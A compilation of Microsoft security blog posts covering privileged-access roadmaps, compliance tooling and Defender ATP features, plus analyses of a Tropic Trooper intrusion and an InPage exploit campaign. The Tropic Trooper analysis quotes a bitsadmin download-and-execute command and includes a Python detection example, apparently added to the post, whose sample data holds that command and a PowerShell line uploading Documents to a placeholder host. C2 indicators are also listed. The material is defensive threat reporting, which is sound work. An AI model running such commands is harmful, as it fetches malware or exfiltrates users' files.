Once you start cataloging all the high-value assets and who can impact them, it quickly becomes clear that we aren't just talking about traditional IT admins when we talk about privileged accounts. There are people who manage social media accounts rich with customer data, cloud services admins, and those that manage directories or financial data. All of these user accounts need to be secured (though most organizations start with IT admins first and then progress to others, prioritized based on risk or the ability to secure the account quickly).

Protecting the privileged access lifecycle is also more than just vaulting the credentials. Organizations need to take a complete and thoughtful approach to isolate the organization's systems from risks. It requires changes to:

  • Processes, habits, administrative practices, and knowledge management.
  • Technical components such as host defenses, account protections, and identity management.

Principles of securing privileged access

Securing all aspects of the privileged lifecycle really comes down to the following principles:

  • Strengthen authentication:

    • Move beyond relying solely on passwords, which are too often weak or easily guessed, to a password-less, Multi-Factor Authentication (MFA) solution that uses at least two forms of authentication, such as a PIN, biometrics, and/or a code generated by a device.
    • Make sure you detect and remediate leaked credentials.

  • Reduce the attack surface:

    • Remove legacy/insecure protocols.
    • Remove duplicate/weak passwords.
    • Reduce dependencies.

  • Increase monitoring and detection.
  • Automate threat response.
  • Ensure usability for administrators.

To illustrate the importance we place on privileged access controls, I've included a diagram that shows how Microsoft protects itself. You'll see we have instituted traditional defenses for securing the network, as well as made extensive investments into development security, continuous monitoring, and processes to ensure we are looking at our systems with an attacker's eye. You can also see how we place a very high priority on security for privileged users, with extensive training, rigorous processes, separate workstations, as well as strong authentication.

Prioritize quick, high-value changes first using our roadmap

To help our customers get the most protection for their investment of time/resources, we have created prescriptive roadmaps to kickstart your planning. These will help you plan out your initiatives in phases, so you can knock out quick wins first and then incrementally increase your security over time.

Check out the Azure Active Directory (Azure AD) roadmap to plan out protections for the administration of this critical system. We also have an on-premises roadmap focused on Active Directory admins, which I've included below. Since many organizations run hybrid networks, we will soon merge these two roadmaps.

On-premises privileged identity roadmap

There are three stages to secure privileged access for an on-premises AD.

Stage 1 (30 days)

Stage 1 of the roadmap is focused on quickly mitigating the most frequently used attack techniques of credential theft and abuse.

1. Separate accounts: This is the first step to mitigate the risk of an internet attack (phishing attacks, web browsing) from impacting administrative privileges.

2 and 3. Unique passwords for workstations and servers: This is a critical containment step to protect against adversaries stealing and re-using password hashes for local admin accounts to gain access to other computers.

4. Privileged access workstations (PAW) stage 1: This reduces internet risks by ensuring that the workstations admins use every day are protected at a very high level.

5. Identity attack detection: Ensures that security operations have visibility into well-known attack techniques on admins.

Stage 2 (90 days)

These capabilities build on the mitigations from the 30-day plan and provide a broader spectrum of mitigations, including increased visibility and control of administrative rights.

1. Require Windows Hello for Business: Replace hard-to-remember and easy-to-hack passwords with strong, easy-to-use authentication for your admins.

2. PAW stage 2: Requiring separate admin workstations significantly increases the security of the accounts your admins use to do their work. This makes it extremely difficult for adversaries to get access to your admins and is modeled on the systems we use to protect Azure and other sensitive systems at Microsoft (described earlier).

3. Just-in-time privileges: Lowers the exposure of privileges and increases visibility into privilege use by granting them to admins only when they need them. This same principle is applied rigorously to admins of our cloud.

4. Enable Credential Guard on Windows 10 workstations: This isolates secrets for authentication protocols like Kerberos and NTLM on all Windows 10 user workstations to make it more difficult for attackers to operate there and reach the admins.

5. Leaked credentials 1: This enables you to detect a risk of a leaked password by synchronizing password hashes to Azure AD where it can compare them to known leaked credentials.

6. Lateral movement vulnerability detection: Discover which sensitive accounts in your network are exposed because of their connection to non-sensitive accounts, groups, and machines.

Stage 3: Proactively secure posture

These capabilities build on the mitigations from previous phases and move your defenses into a proactive posture. While there will never be perfect security, this represents the strongest protections against privilege attacks currently known and available today.

1. Review role-based access control: Protect identity and management systems using a set of buffer zones between full control of the environment (Tier 0) and the high-risk workstation assets that attackers frequently compromise.

2. PAW stage 3: Expands your protection by separating internet risks (phishing attacks, web browsing) from all administrative privileges, not just AD admins.

3. Lower the attack surface of the domain and domain controllers: This hardens these sensitive assets to make it difficult for attackers to compromise them with classic attacks like exploiting unpatched vulnerabilities and configuration weaknesses.

4. Leaked credentials 2: This steps up the protection of admin accounts against leaked credentials by forcing a reset of passwords using conditional access and self-service password reset (versus requiring someone to review the leaked credentials reports and manually take action).

Securing your administrative accounts will reduce your risk significantly. Stay tuned for the hybrid roadmap, which will be completed in early 2019.

The post Secure your privileged administrative accounts with a phased roadmap appeared first on Microsoft Secure.

Categories: cybersecurity Tags:

Windows Defender ATP device risk score exposes new cyberattack, drives Conditional access to protect networks

November 28th, 2018 No comments

Several weeks ago, the Windows Defender Advanced Threat Protection (Windows Defender ATP) team uncovered a new cyberattack that targeted several high-profile organizations in the energy and food and beverage sectors in Asia. Given the target region and verticals, the attack chain, and the toolsets used, we believe the threat actor that the industry refers to as Tropic Trooper was likely behind the new attack.

The attack set off numerous Windows Defender ATP alerts and triggered the device risk calculation mechanism, which labeled the affected machines with the highest risk. The high device risk score put the affected machines at the top of the list in Windows Defender Security Center, which led to the early detection and discovery of the attack.

With the high risk determined for affected machines, Conditional access blocked these machines' access to sensitive content, protecting other users, devices, and data in the network. IT admins can control access with Conditional access based on the device risk score to ensure that only secure devices have access to enterprise resources.

Finally, automatic investigation and remediation kicked in, discovered the artifacts on the affected machines that were related to the breach, and remediated the threat. This sequence of actions ensured that the attackers no longer had a foothold on the affected machines, returning them to a normal working state. Once the threat was remediated, the risk score for those machines was reduced and the Conditional access restrictions were lifted.

Investigating alert timelines and process trees

We discovered the attack when Windows Defender ATP called our attention to alerts flagging several different suspicious activities like abnormal Office application activity, dubious cross-process injections, and machine-learning-based indications of anomalous execution flows. The sheer volume and variety of the alerts told us something serious was going on.

Figure 1. Multiple alerts triggered by the attack

The first detection related to the attack was fired by a suspicious EQNEDT32.exe behavior, which led us to the entry vector of the attack: a malicious document that carried an exploit for CVE-2018-0802, a vulnerability in Microsoft Office Equation Editor, which the actor known as Tropic Trooper has exploited in previous campaigns.

Through the tight integration between Windows Defender ATP and Office 365 ATP, we were able to use Office 365 ATP Threat Explorer to find the specific emails that the attackers used to distribute the malicious document.

Using Windows Defender Security Center, we further investigated the detected executable and found that the attackers used bitsadmin.exe to download and execute a randomly named payload from a remote server:

bitsadmin /transfer Cd /priority foreground http:/<IP address>:4560/.exe %USERPROFILE%\fY.exe && start %USERPROFILE%\fY.exe

Machine timeline activity showed that the executed payload communicated to a remote command-and-control (C&C) server and used process hollowing to run code in a system process memory.

In some cases, the attacker ran additional activities using malicious PowerShell scripts. Windows Defender ATP's Antimalware Scan Interface (AMSI) sensor exposed all the attacker scripts, which we observed were meant mostly for data exfiltration.

Figure 2. Process tree

Using the timeline and process tree views in Windows Defender Security Center, we were able to identify the processes exhibiting malicious activities and pinpoint exactly when they occurred, allowing us to reconstruct the attack chain. As a result of this analysis, we were able to determine a strong similarity between this new attack and the attack patterns used by the threat actor known as Tropic Trooper.

Figure 3. Campaign attack chain

Device risk calculation and incident prioritization

The alerts raised for this attack resulted in a high device risk score for the affected machines. Windows Defender ATP determines a device risk score based on several mechanisms. The score is meant to raise the risk level of machines with true positive alerts that indicate a potential targeted attack. The high device risk score pushed the affected machines to the top of the queue, helping ensure that security operations teams notice and prioritize them immediately. More importantly, elevated device risk scores trigger automatic investigation and response, helping contain attacks early in their lifespan.

In this specific attack, the risk calculation mechanism gave the affected machines the highest risk based on cumulative risk. Cumulative risk is calculated from the multiple components and multiple types of anomalous behavior exhibited by an attack across the infection chain.

Windows Defender ATP-driven conditional access

When Windows Defender ATP raises the device risk score for machines, as in this attack, the affected devices are marked as being at high risk. This risk score is immediately communicated to Conditional access, resulting in the restriction of access from these devices to corporate services and data managed by Azure Active Directory.

This integration between Windows Defender ATP and Azure Active Directory through Microsoft Intune ensures that attackers are immediately prevented from gaining access to sensitive corporate data, even if attackers manage to establish a foothold on networks. When the threat is remediated, Windows Defender ATP drops the device risk score, and the device regains access to resources. Read more about Conditional access here.
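The detection-to-risk-to-access flow described in this post, as an added illustrative example (not Windows Defender ATP's own code; its real risk calculation is not published here): constructed telemetry modelled on the chain above (Equation Editor, bitsadmin download-and-execute, process hollowing, PowerShell exfiltration), simple detections, a cumulative risk score that rewards distinct behaviour types rather than alert volume, and the resulting Conditional access decision. Device names, the TEST-NET IP address and the payload file name are placeholders.

```python
import re
from dataclasses import dataclass

# Constructed telemetry for two devices. WS-017 mirrors the attack chain in the
# post; WS-042 shows a benign bitsadmin job so the detection has a negative case.
# Host names, the 203.0.113.5 address and fY.exe are placeholders, not real IoCs.
SAMPLE_EVENTS = [
    {"device": "WS-017", "kind": "process", "parent": "WINWORD.EXE", "image": "EQNEDT32.EXE",
     "cmdline": "EQNEDT32.EXE -Embedding"},
    {"device": "WS-017", "kind": "process", "parent": "EQNEDT32.EXE", "image": "cmd.exe",
     "cmdline": ("cmd /c bitsadmin /transfer Cd /priority foreground "
                 "http://203.0.113.5:4560/fY.exe %USERPROFILE%\\fY.exe "
                 "&& start %USERPROFILE%\\fY.exe")},
    {"device": "WS-017", "kind": "injection", "source": "fY.exe", "target": "svchost.exe",
     "technique": "process hollowing"},
    {"device": "WS-017", "kind": "amsi_script", "engine": "PowerShell",
     "content": ("Compress-Archive -Path $env:USERPROFILE\\Documents -DestinationPath $t; "
                 "Invoke-WebRequest -Uri http://203.0.113.5/up -Method POST -InFile $t")},
    {"device": "WS-042", "kind": "process", "parent": "explorer.exe", "image": "bitsadmin.exe",
     "cmdline": ("bitsadmin /transfer job /download /priority normal "
                 "https://updates.example.internal/patch.msi C:\\Temp\\patch.msi")},
]


@dataclass(frozen=True)
class Alert:
    device: str
    category: str   # distinct behaviour type; drives the cumulative score
    severity: int   # 1 (informational) .. 10 (critical)
    title: str


OFFICE_APPS = {"WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE", "OUTLOOK.EXE"}
# bitsadmin fetching a remote URL and chaining execution with "&& start"
BITS_DL_EXEC = re.compile(r"bitsadmin\s+/transfer\b.*?\bhttps?://\S+.*?&&\s*start\b", re.I)
# crude script-content hints that together suggest collection plus upload
EXFIL_HINTS = ("invoke-webrequest", "-method post", "compress-archive", "-infile")


def detect(event):
    """Map one telemetry event to zero or more alerts."""
    alerts = []
    dev, kind = event["device"], event["kind"]
    if kind == "process":
        if event["parent"].upper() in OFFICE_APPS and event["image"].upper() == "EQNEDT32.EXE":
            alerts.append(Alert(dev, "abnormal_office_activity", 6, "Office spawned Equation Editor"))
        if BITS_DL_EXEC.search(event["cmdline"]):
            alerts.append(Alert(dev, "lolbin_download_execute", 8, "bitsadmin download-and-execute chain"))
    elif kind == "injection":
        alerts.append(Alert(dev, "cross_process_injection", 9,
                            f"{event['technique']} into {event['target']}"))
    elif kind == "amsi_script":
        hits = sum(h in event["content"].lower() for h in EXFIL_HINTS)
        if hits >= 2:
            alerts.append(Alert(dev, "script_exfiltration", 7, "AMSI: script with exfiltration indicators"))
    return alerts


def device_risk(alerts):
    """Cumulative risk: the worst single alert plus a bonus for every additional
    distinct behaviour category, so a varied chain outranks many repeats of one
    alert. Returns (score, level)."""
    if not alerts:
        return 0, "none"
    categories = {a.category for a in alerts}
    score = max(a.severity for a in alerts) + 3 * (len(categories) - 1)
    if score >= 15 or len(categories) >= 3:
        return score, "high"
    return score, ("medium" if score >= 8 else "low")


def conditional_access(level):
    """Policy decision: only devices at no or low risk reach sensitive resources."""
    return "allow" if level in ("none", "low") else "block"


def assess(events):
    """Run detection over all events; return {device: (score, level, access)}."""
    per_device = {}
    for ev in events:
        per_device.setdefault(ev["device"], []).extend(detect(ev))
    result = {}
    for dev, alerts in per_device.items():
        score, level = device_risk(alerts)
        result[dev] = (score, level, conditional_access(level))
    return result


if __name__ == "__main__":
    for dev, (score, level, access) in assess(SAMPLE_EVENTS).items():
        print(f"{dev}: score={score} risk={level} access={access}")
```

Remediation would clear the alerts feeding `device_risk`, which is what lets the score drop and the access block lift once the threat is resolved.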

Signal sharing and threat remediation across Microsoft Threat Protection

In this attack investigation, the integration of Windows Defender ATP and Office 365 ATP allowed us to trace the entry vector, and security operations teams can seamlessly pivot between the two services, enabling them to investigate the end-to-end timeline of an attack.

Threat signal sharing across services through the Intelligent Security Graph ensures that threat remediation is orchestrated across Microsoft Threat Protection. In this case, Office 365 ATP blocked the related email and malicious document used in the initial stages of the attack. Office 365 ATP had determined the malicious nature of the emails and attachment at the onset, stopping the attack's entry point and protecting Office 365 ATP customers from the attack.

This threat signal is shared with Windows Defender ATP, adding to the rich threat intelligence that was used for investigation. Likewise, Office 365 ATP consumes intelligence from Windows Defender ATP, helping make sure that malicious attachments are detected and related emails are blocked.

Meanwhile, as mentioned, the integration of Windows Defender ATP and Azure Active Directory ensured that affected devices were not allowed to access sensitive corporate data until the threat was resolved.

Windows Defender ATP, Office 365 ATP, and Azure Active Directory are just three of the many Microsoft services now integrated through Microsoft Threat Protection, an integrated solution for securing identities, endpoints, user data, cloud apps, and infrastructure.


The new device risk calculation mechanism in Windows Defender ATP raised the priority of various alerts that turned out to be related to a targeted attack, exposing the threat and allowing security operations teams to immediately take remediation actions. Additionally, the elevated device risk score triggered automated investigation and response, mitigating the attack at its early stages.

Through Conditional access, compromised machines are blocked from accessing critical corporate assets. This protects organizations from the serious risk of attackers leveraging compromised devices to perform cyberespionage and other types of attacks.

To test how these and other advanced capabilities in Windows Defender ATP can help your organization detect, investigate, and respond to attacks, sign up for a free trial.



Hadar Feldman and Yarden Albeck
Windows Defender ATP team



Indicators of attack (IoCs)

Command and control IP addresses and URLs:

  • 199[.]192[.]23[.]231
  • 45[.]122[.]138[.]6
  • lovehaytyuio09[.]om

Files (SHA-256):

  • 9adfc863501b4c502fdac0d97e654541c7355316f1d1663b26a9aaa5b5e722d6 (size: 190696 bytes, type: PE)
  • 5589544be7f826df87f69a84abf478474b6eef79b48b914545136290fee840fe (size: 727552 bytes, type: PE)
  • 073884caf7df8dafc225567f9065bbf9bf8e5beef923655d45fe5b63c6b6018c (size: 195123 bytes, type: docx)
  • 1aef46dcbf9f0b5ff548f492685d488c7ac514a24e63a4d3ed119bfdbd39c908 (size: 207444 bytes, type: docx)






The post Windows Defender ATP device risk score exposes new cyberattack, drives Conditional access to protect networks appeared first on Microsoft Secure.


How to help maintain security compliance

November 26th, 2018 No comments

This is the last post in our eight-blog series on deploying Intelligent Security scenarios. To read the previous entries, check out the Deployment series page.

Image taken at the Microsoft Ignite Conference.

Your employees need to access, generate, and share organizational information ranging from extremely confidential to informal; you must ensure that all information and the movement of that information comply with industry standards without inhibiting workflow. Microsoft 365 security solutions can help you know what's happening with your data, set permissions and classifications, and discover and help prevent leaks.

How can I make it easier to manage compliance processes?

To better manage compliance processes, the first thing you'll want to do is distribute the work out to compliance specialists across your organization. The Microsoft 365 Security & Compliance Center (Figure 1) makes this easy by providing a central location to assign people to specific compliance tasks, such as data loss prevention, eDiscovery, and data governance.

Figure 1: The Microsoft 365 Security & Compliance Center Dashboard.

Next, you'll need to decide on your policies and data classifications that will allow you to take actions on data. To streamline this compliance task, Microsoft Advanced Data Governance offers automatic data classification and proactive policy recommendations, such as retention and deletion policies, throughout the data lifecycle. You can enable default system alerts to identify data governance risks, for example, detecting an employee deleting a large volume of files. You can also create custom alerts by specifying alert-matching conditions, thresholds, or other activities that require admin attention.

How do I assess data protection controls in an ever-changing compliance landscape?

The Microsoft Security Compliance Manager (Figure 2) provides tools to proactively manage evolving data privacy regulations. You can perform ongoing risk assessments on security, compliance, and privacy controls across 11 assessments, including these standards:

  • ISO 27001
  • ISO 27018
  • NIST 800-53

Plus, regional standards and regulations, including:

  • GDPR

As well as industry standards and regulations, such as:

  • NIST 800-171
  • FedRAMP Moderate
  • FedRAMP High

Additionally, the Compliance Manager provides you with step-by-step guidance on how to implement controls to enhance your compliance posture and keeps you updated on the current compliance landscape. In addition, built-in collaboration tools help you assign, track, and record compliance activities to prepare for internal or external audits.

Figure 2: Compliance Manager provides tools to proactively manage evolving data privacy regulations.

How can I protect my data no matter where it lives or travels?

With employees, partners, and other users sharing your data over cloud services, mobile devices, and apps, you need solutions that understand what data is sensitive and automatically protect and govern that data. The unified labeling experience for Microsoft 365 in the Security & Compliance Center provides a tool that allows you to configure data sensitivity labels and protection policies across Azure Information Protection and Office 365 in one location (Figure 3). You can create and customize labels that define the sensitivity of the data; for example, a label of General means the file doesn't contain sensitive information, while Highly Confidential means the file contains very sensitive information. For each label, you can configure protection settings, such as adding encryption and access restrictions, or adding visual markings such as watermarks or headers/footers. To support data governance compliance, you can set policies for data retention, deletion, and disposition, and then automatically apply or publish these labels to users.

Figure 3: Configure data sensitivity labels and protection policies across Azure Information Protection and Office 365 in one location.

There are over 85 built-in sensitive information types that you can use to automatically detect common sensitive data types that may be subject to compliance requirements, such as credit card information, bank account information, passport IDs, and other personal data types. You can also create your own custom sensitive information types (such as employee ID numbers) or upload your own dictionary of terms that you want to automatically detect in documents and emails.

How can I help protect privileged accounts from compromise?

Controlling privileged access can reduce the risk of data compromise and help meet compliance obligations regarding access to sensitive data. Privileged access management (PAM) in Office 365 (Figure 4), available in the Microsoft 365 Admin Center, allows you to enforce zero standing access for your privileged administrative accounts. Zero standing access means users don't have privileges by default. When permissions are provided, it's at the bare minimum with just enough access to perform the specific task. Users who need to perform a high-risk task must request permissions for access, and once received all activities are logged and auditable. It's the same principle that defines how Microsoft gives access to its datacenters and reduces the likelihood that a bad actor can gain access to your privileged accounts.

Figure 4: Privileged access management allows you to enforce zero standing access for your privileged administrative accounts.

Plan for success with Microsoft FastTrack. FastTrack comes with your subscription at no additional charge. Whether you're planning your initial rollout, needing to onboard your product, or driving user adoption, FastTrack is your benefit service that is ready to assist you. Get started with FastTrack for Microsoft 365.

Want to learn more?

For more information and guidance on this topic, check out the white paper Maintain compliance with controls and visibility that adhere to global standards. You can find additional security resources on

Coming Soon! Stay tuned for our new series: Top 10 actions you can take with Microsoft 365 Security.


The post How to help maintain security compliance appeared first on Microsoft Secure.


What’s new in Windows Defender ATP

November 15th, 2018 No comments

Across Windows Defender Advanced Threat Protection (Windows Defender ATP) engineering and research teams, innovation drives our mission to protect devices in the modern workplace. Our goal is to equip security teams with the tools and insights to protect, detect, investigate, and automatically respond to attacks. We continue to be inspired by feedback from customers and partners, who share with us the day-to-day realities of security operations teams constantly keeping up with the onslaught of threats.

Today I'm excited to share with you some of the latest significant enhancements to Windows Defender ATP. We added new capabilities to each of the pillars of Windows Defender ATP's unified endpoint protection platform: improved attack surface reduction, better-than-ever next-gen protection, more powerful post-breach detection and response, enhanced automation capabilities, more security insights, and expanded threat hunting. These enhancements boost Windows Defender ATP and accrue to the broader Microsoft Threat Protection, an integrated solution for securing identities, endpoints, cloud apps, and infrastructure.

Let's look now at some of the new enhancements to Windows Defender ATP:

New attack surface reduction rules

Attack surface reduction forms the backbone of our answer to a host intrusion prevention system (HIPS). Attack surface reduction protects devices directly, by controlling and limiting the ways in which threats can operate on a device. Today we are announcing two new rules:

  • Block Office communication applications from creating child processes
  • Block Adobe Reader from creating child processes

These new rules allow enterprises to prevent child processes from being created from Office communication apps (including Outlook) and from Adobe Reader, right at the workstation level. These help eliminate many types of attacks, especially those using macro and vulnerability exploits. We have also added improved customization for exclusions and allow lists, which can work for folders and even individual files.

Emergency security intelligence updates

Emergency security intelligence updates are a new, super-fast delivery method for protection knowledge. In the event of an outbreak, the Windows Defender ATP research team can now issue an emergency request to all cloud-connected enterprise machines to immediately pull dedicated intelligence updates directly from the Windows Defender ATP cloud. This reduces the need for security admins to take action or wait for internal client update infrastructure to catch up, which often takes hours or even longer, depending on configuration. There's no special configuration for this other than ensuring cloud-delivered protection is enabled on devices.

Top scores in independent industry tests

Machine learning and artificial intelligence drive our WDATP solution to block 5 billion threats every month and to consistently achieve top scores in independent industry tests: perfect scores in protection, usability, and performance test modules in the latest evaluation by AV-TEST; 99.8% protection rate in the latest real-world test by AV-Comparatives; and AAA accuracy rating in the latest SE Labs test.

We have added dedicated detections for cryptocurrency mining malware (coin miners) which have increasingly become a problem, even for enterprises. We have also increased our focus on detecting and disrupting tech support scams while they are happening.

Protecting our security subsystems using sandboxing

We've also continued to invest in hardening our platform to make it harder for malicious actors to exploit vulnerabilities and bypass the operating system's built-in security features. We've done this by putting Windows Defender ATP's antivirus in a dedicated sandbox. Sandboxing makes it significantly more difficult for an attacker to tamper with and exploit the antivirus solution as a means to compromise the device itself.

Evolving from individual alerts to Incidents

We are introducing Incidents, an aggregated view that helps security analysts to understand the bigger context of a complex security event. As attacks become more sophisticated, security analysts face the challenge of reconstructing the story of an attack. This includes identifying all related alerts and artifacts across all impacted machines and then correlating all of these across the entire timeline of an attack.

With Incidents, related alerts are grouped together, along with the machines involved and the corresponding automated investigations, presenting all collected evidence and showing the end-to-end breadth and scope of an attack. By transforming the queue from hundreds of individual alerts to a more manageable number of meaningful aggregations, Incidents eliminate the need to review alerts sequentially and to manually correlate malicious events across the organization, saving up to 80% of analyst time.

The Incident graph view shows you the relations between the entities, with additional details in the side pane when you click on an item.

Automating response for fileless attacks

We expanded automation in Windows Defender ATP to automatically investigate and remediate memory-based attacks, also known as fileless threats. We see more and more of these memory-based threats, and while we've had the optics to detect them, security analysts needed special investigation skills to solve them. Windows Defender ATP can now leverage automated memory forensics to incriminate memory regions and perform required in-memory remediation actions.

With this new unique capability, we are shifting from simply alerting to a fully automated investigation and resolution flow for memory-based attacks. This increases the range of threats addressable by automation and further reduces the load on security teams.

Process injection automatically investigated and remediated

Threat analytics

Threat analytics is a set of interactive threat intelligence reports published by our research team as soon as emerging threats and outbreaks are identified. The Threat analytics dashboard provides a technical description of and data about a threat, and answers the key question: Does WDATP detect this threat? It also provides recommended actions to contain and prevent specific threats, as well as to increase organizational resilience.

But we don't stop there. We also provide an assessment of the impact of threats on your environment (Am I hit?), as well as a view of how many machines were protected (Were you able to stop this?) and how many are exposed to the threat because they are not up to date or are misconfigured (Am I exposed?).

Threat analytics dashboard

Custom detection rules

With Advanced hunting, security analysts love the power they now have to hunt for possible threats across their organization using flexible queries. A growing community of security researchers share their queries with others using the GitHub community repository. These queries can now also be used as custom detection rules, which means that these queries will automatically create and raise an alert when a scheduled query returns a result.

Creating custom detection rules from advanced hunting queries

Integration with Microsoft Information Protection

Windows Defender ATP now provides built-in capabilities for discovery and protection of sensitive data on enterprise endpoints. We have integrated with Azure Information Protection (AIP) Data Discovery, providing visibility to labeled files stored on endpoints. AIP dashboard and log analytics will include files discovered on Windows devices alongside device risk info from Windows Defender ATP, allowing customers to discover sensitive data at risk on Windows endpoints.

Windows Defender ATP can also automatically protect sensitive files based on their label. Through Office Security and Compliance (SCC) policy, Windows Defender ATP automatically enables Windows Information Protection (WIP) for files with labels that correspond to Office SCC policy.

Integration with Microsoft Cloud App Security

Windows Defender ATP uniquely integrates with Microsoft Cloud App Security to enhance the discovery of shadow IT in an organization as seen from enterprise endpoints. Windows Defender ATP provides a simplified rollout of Cloud App Security discovery as it feeds Cloud App Security with endpoint signals, reducing the need for collecting signals via corporate proxies and allowing seamless collection of signals even when endpoints are outside of the corporate network.

Through this integration, Microsoft Cloud App Security leverages Windows Defender ATP to collect traffic information about client-based and browser-based cloud apps and services being accessed from IT-managed Windows 10 devices. This seamless integration does not require any additional deployment and gives admins a more complete view of the usage of cloud apps and services in their organization.

Innovations that work for you today and the future

These new features in the Windows Defender Advanced Threat Protection unified security platform combine the world-class expertise inside Microsoft with the insightful feedback from you, our customers, for whom we built these solutions. We ask that you continue to engage and partner with us as we continue to evolve Windows Defender ATP.

You can test all new and existing features by signing up to a free 60-day fully featured Windows Defender ATP trial. You can also test drive attack surface reduction and next-gen protection capabilities using the Windows Defender demo page or run DIY simulations for features like Incidents, automated investigation and response, and others directly from the Windows Defender security center portal to see how these capabilities help your organization in real-world scenarios.

Meanwhile, the work to stay ahead of threats doesn't stop. You can count on the Windows Defender ATP team to continue innovating, learning from our own experiences, and partnering with you to empower you to confidently protect, detect, and respond to advanced attacks.



Moti Gindi
General Manager, Windows Cyber Defense


The post What’s new in Windows Defender ATP appeared first on Microsoft Secure.


CISO series: Lessons learned—4 priorities to achieve the largest security improvements

November 13th, 2018

In my past life as CISO, I've worked for small companies, state governments, and large enterprises, and one thing that has been true at all of them is that there is an infinite number of security initiatives in each organization you could implement, yet the resources to accomplish those tasks are finite. To be an effective CISO, I had to learn to appropriate the resources under my control toward the solutions that confront the greatest risk to the most valuable parts of the business. I also had to learn how to extend my own resource pool by persuading every individual at the company that they had a role to play in protecting the organization. In short, I learned to aggressively prioritize resources, quantify risk, and influence others.

In this blog, I'll share the methods I've used to prioritize where and how I spend my resources. There really are just four priorities to achieve the largest security improvements:

  1. Identify what is under your control.
  2. Formulate a security strategy.
  3. Implement good cybersecurity hygiene.
  4. Disrupt the cyber kill chain.

Identify the business you are charged with protecting

Before you can begin to allocate your resources, you first need to identify what is under your control. What are the capital and operating budgets available for security, and who are the people responsible for security? You may manage security professionals both inside and outside the company, and you need to know who they are and their strengths and weaknesses. When it comes time to assign people and budgets to your priorities, this knowledge will prove crucial.

You must also know the business. Get clear about which products, services, and lines of business are the biggest drivers of the organization's success. Once you understand what drives the business and the resources you control, you will need to formulate a strategy.

Formulate a security strategy

Understanding the most critical business drivers will help you formulate a security strategy, which I've written about in more detail in a previous post. When you have your security strategy, you're ready to establish strong cybersecurity hygiene.

Implement good cybersecurity hygiene

One example of how I've prioritized security initiatives as a CISO comes from my time at the State of Colorado. When I first stepped into the CISO role in Colorado state government, I needed to modernize their security approach and address vulnerabilities across the enterprise with a very limited budget. I wanted to show results quickly, so I chose to focus on the small things that could be implemented easily and would drive the greatest reduction in risk.

This approach, often referred to as cybersecurity hygiene, concentrates on hardening systems by leveraging secure configurations, putting in place processes and tools to ensure data, devices, and the network are protected against vulnerabilities, and maintaining the patch levels of critical systems.

Before you move on to more complex initiatives, be sure you've walked through each of the following steps:

Inventory your network: The first step is to identify every inch of your network, because you can't protect what you can't see. You must know what type of equipment is on your network and whether it is part of internal networks, hosted on the internet, or part of a cloud platform. Once you know what you have, you need to maintain a continuously updated inventory of the hardware and software that's authorized to be on your network.

Scan and patch: When you've identified all the devices and applications on your network, you should scan them from a central point on a regular basis and patch and deactivate them remotely as necessary. For larger organizations, the scale of this operation is the challenge, especially with limited maintenance windows, a proliferation of web apps and devices, and architectural complexities. Flexible and scalable security scanning services are therefore becoming increasingly necessary.

Continuously look for vulnerabilities: The frequency and complexity of attacks continue to increase, so it is no longer an option to scan your network on a semi-regular basis. You should try to constantly monitor for threats, and quickly address them within your network.

To help you with this process, you can read more details on cybersecurity hygiene. You should also leverage the cloud as it helps you to quickly modernize and sunset legacy and vulnerable systems, provides more automation, and allows you to inherit and extend your security team by gaining from the expertise of the cloud security provider.

Once your systems are hardened and you have a process and tools to continuously monitor your network, you should next focus on interrupting the most common methods hackers use to enter your network, what we refer to as the cyber kill chain.

Understand and disrupt the cyber kill chain

The kill chain is a workflow that cybercriminals deploy to infiltrate a company. Attackers of all sizes have had great success with this approach, so it is worth understanding and then implementing solutions to circumvent it.

External recon: Most hackers begin their attack by gathering intelligence on your company. They collect data on employees, executives, technologies, and supply chain to increase the odds of a successful attack.

Solution: Enable Multi-Factor Authentication to require that users sign in with two forms of verification, reducing the likelihood that they'll be compromised.

Compromised machine: At this stage, the attacker targets a carefully selected employee with a phishing campaign. This campaign is designed to trick the user into executing an attachment or visiting a site that will install a backdoor on the employee's computer, giving the attacker the ability to control the computer.

Solution: Implement Office 365 Advanced Threat Protection to protect against malicious files.

Internal recon: Once an attacker has compromised a machine, they'll begin to gather intelligence that is newly available, such as credentials stored locally on the machine. They'll also map internal networks and systems. This new information will allow them to plan their next move.

Solution: Use Windows 10's security features, which are designed both to stop the initial infection and, if a machine is infected, to prevent further lateral movement.

Domain dominance: The attacker will try to elevate their access within the network to gain access to a privileged account and your company data.

Solution: Use Microsoft Advanced Threat Analytics to provide a robust set of capabilities to detect this stage of an attack.

Data consolidation and exfiltration: If an attacker gains access to your data, the final step would be to package it up and move it out of the organization without detection, in a process called “data consolidation and exfiltration.” Paying close attention to the first phases of an attack will hopefully prevent an attacker from getting this far.

Focus on what matters most to the business

Even the largest enterprise is faced with tough choices when allocating security resources. If you are smart about how you appropriate them, you can make choices that have the greatest chance of protecting your organization. It starts with understanding your current state, both your resources and the most critical business drivers, formulating a solid strategy, implementing good cybersecurity maintenance, and finally, disrupting the cybersecurity kill chain.

In the coming weeks, I will share lessons I've learned to evaluate risks quantitatively. And following this, I will talk about how I've learned to influence others to take their role in protecting the organization very seriously.

To read more blogs from the series, visit the CISO series page.

The post CISO series: Lessons learned—4 priorities to achieve the largest security improvements appeared first on Microsoft Secure.


Attack uses malicious InPage document and outdated VLC media player to give attackers backdoor access to targets

November 8th, 2018

Our analysis of a targeted attack that used a language-specific word processor shows why it's important to understand and protect against small-scale and localized attacks as well as broad-scale malware campaigns. The attack exploited a vulnerability in InPage, a word processor for specific languages like Urdu, Persian, Pashto, and Arabic.

More than 75% of the targets were located in Pakistan; however, the attack also found its way into some countries in Europe and the US. The targets included government institutions.

Figure 1. Geographic distribution of targets

In the past, researchers at Palo Alto and Kaspersky have blogged about attacks that use malicious InPage documents. Beyond that, public research of these types of attacks has been limited.

The Office 365 Research and Response team discovered this type of targeted attack in June. The attack was orchestrated using the following approach:

  • Spear-phishing email with a malicious InPage document with the file name hafeez saeed speech on 22nd April.inp was sent to the intended victims
  • The malicious document, which contained exploit code for CVE-2017-12824, a buffer-overflow vulnerability in InPage reader, dropped a legitimate but outdated version of VLC media player that is vulnerable to DLL hijacking
  • The side-loaded malicious DLL called back to a command-and-control (C&C) site, which triggered the download and execution of the final malware encoded in a JPEG file format
  • The final malware allowed attackers to remotely execute arbitrary commands on the compromised machine

Figure 2. Attack infection chain

Office 365 Advanced Threat Protection (ATP) protects customers from this attack by detecting the malicious InPage attachment in spear-phishing emails used in the campaign. Office 365 ATP inspects email attachments and links for malicious content and provides real-time protection against attacks.

